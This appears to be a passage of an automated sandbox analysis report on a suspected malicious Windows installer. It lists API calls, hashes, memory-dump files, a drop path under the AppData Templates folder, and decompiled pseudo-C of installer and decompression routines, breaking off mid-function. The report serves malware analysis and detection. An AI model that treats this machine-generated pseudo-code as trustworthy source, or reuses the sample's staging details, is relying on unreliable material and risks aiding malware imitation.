                                                            0x00000000
                                                            0x00404844
                                                            0x00000000
                                                            0x004047af
                                                            0x004047bc
                                                            0x004047c5
                                                            0x004047d2
                                                            0x004047d2
                                                            0x004047d9
                                                            0x004047df
                                                            0x004047e8
                                                            0x004047eb
                                                            0x004047ee
                                                            0x004047f6
                                                            0x004047f9
                                                            0x004047fc
                                                            0x00404802
                                                            0x00404809
                                                            0x00404810
                                                            0x00404aa2
                                                            0x00404ab4
                                                            0x00404816
                                                            0x00404819
                                                            0x00000000
                                                            0x00404819
                                                            0x00404810

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 004047B5
                                                            • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                            • SHBrowseForFolderA.SHELL32(?,00436068,?), ref: 00404890
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                            • lstrcmpiA.KERNEL32(Call,0043C090,00000000,?,?), ref: 004048CD
                                                            • lstrcatA.KERNEL32(?,Call), ref: 004048D9
                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048EB
                                                              • Part of subcall function 00405951: GetDlgItemTextA.USER32 ref: 00405964
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040658D
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659A
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659F
                                                              • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            • GetDiskFreeSpaceA.KERNEL32(00434060,?,?,0000040F,?,00434060,00434060,?,00000001,00434060,?,?,000003FB,?), ref: 004049A9
                                                            • MulDiv.KERNEL32 ref: 004049C4
                                                              • Part of subcall function 00404B1D: lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                              • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                              • Part of subcall function 00404B1D: SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: <r$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Call$`@C
                                                            • API String ID: 2624150263-2160697206
                                                            • Opcode ID: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction ID: 1e5cde7c6216eed5206fee0a992a61c18a0705ae5e449ea6cb8cf0fac14b4d51
                                                            • Opcode Fuzzy Hash: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction Fuzzy Hash: 74A16EB1A00209ABDB11AFA6CD41BAF77B8AF84314F10847BF601B62D1D77C99418F6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402173 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E00402173() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402C39(0xfffffff0);
				 *(_t111 - 0xc) = E00402C39(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402C39(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402C39(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402C39(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C56( *(_t111 - 0xc)) == 0) {
					E00402C39(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x2000) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                            0x0040217c
                                                            0x00402186
                                                            0x00402190
                                                            0x0040219d
                                                            0x004021a8
                                                            0x004021ab
                                                            0x004021c5
                                                            0x004021cb
                                                            0x004021d1
                                                            0x004021d4
                                                            0x004021de
                                                            0x004021e2
                                                            0x004021e2
                                                            0x004021e7
                                                            0x004021f8
                                                            0x00402200
                                                            0x004022dc
                                                            0x004022dc
                                                            0x004022e3
                                                            0x00402206
                                                            0x00402206
                                                            0x00402215
                                                            0x00402219
                                                            0x0040221c
                                                            0x00402222
                                                            0x00402230
                                                            0x00402233
                                                            0x00402235
                                                            0x00402240
                                                            0x00402240
                                                            0x00402245
                                                            0x00402247
                                                            0x0040224e
                                                            0x0040224e
                                                            0x00402251
                                                            0x0040225a
                                                            0x0040225d
                                                            0x00402262
                                                            0x00402264
                                                            0x00402271
                                                            0x00402271
                                                            0x00402274
                                                            0x00402280
                                                            0x00402283
                                                            0x0040228c
                                                            0x00402292
                                                            0x00402299
                                                            0x004022b2
                                                            0x004022b4
                                                            0x004022c2
                                                            0x004022c2
                                                            0x004022b2
                                                            0x004022c5
                                                            0x004022cb
                                                            0x004022cb
                                                            0x004022ce
                                                            0x004022d4
                                                            0x004022da
                                                            0x004022ef
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004022da
                                                            0x004022e5
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?), ref: 004021F8
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00002000,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00402238
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 123533781-4054825685
                                                            • Opcode ID: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction ID: de46d6ec528c0b0c8935217740d64446ab711007b8cbb855df2cc617b58c6e92
                                                            • Opcode Fuzzy Hash: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction Fuzzy Hash: 37511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004027AA Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 39%
                                                            			E004027AA(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402C39(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061B5(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406257();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                            0x004027c2
                                                            0x004027d6
                                                            0x004027e1
                                                            0x004027e2
                                                            0x00402931
                                                            0x004027c4
                                                            0x004027c4
                                                            0x004027c6
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 41d340d0e0decd5c5240f79b51cbacb9949563f63550bc6cd14aca042e9f64a0
                                                            • Instruction ID: 399c6a6cf60972f2d7a512407c1446c7d57098f317d76a59d8a1514aa82d2ac6
                                                            • Opcode Fuzzy Hash: 41d340d0e0decd5c5240f79b51cbacb9949563f63550bc6cd14aca042e9f64a0
                                                            • Instruction Fuzzy Hash: 51F0A072608144ABD710EBA49A49AEEB7689F52324F60447BF142B20C2D7B889449B3A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406AA8 Relevance: .3, Instructions: 334COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E00406AA8(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00407217( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040727F( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071D7))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
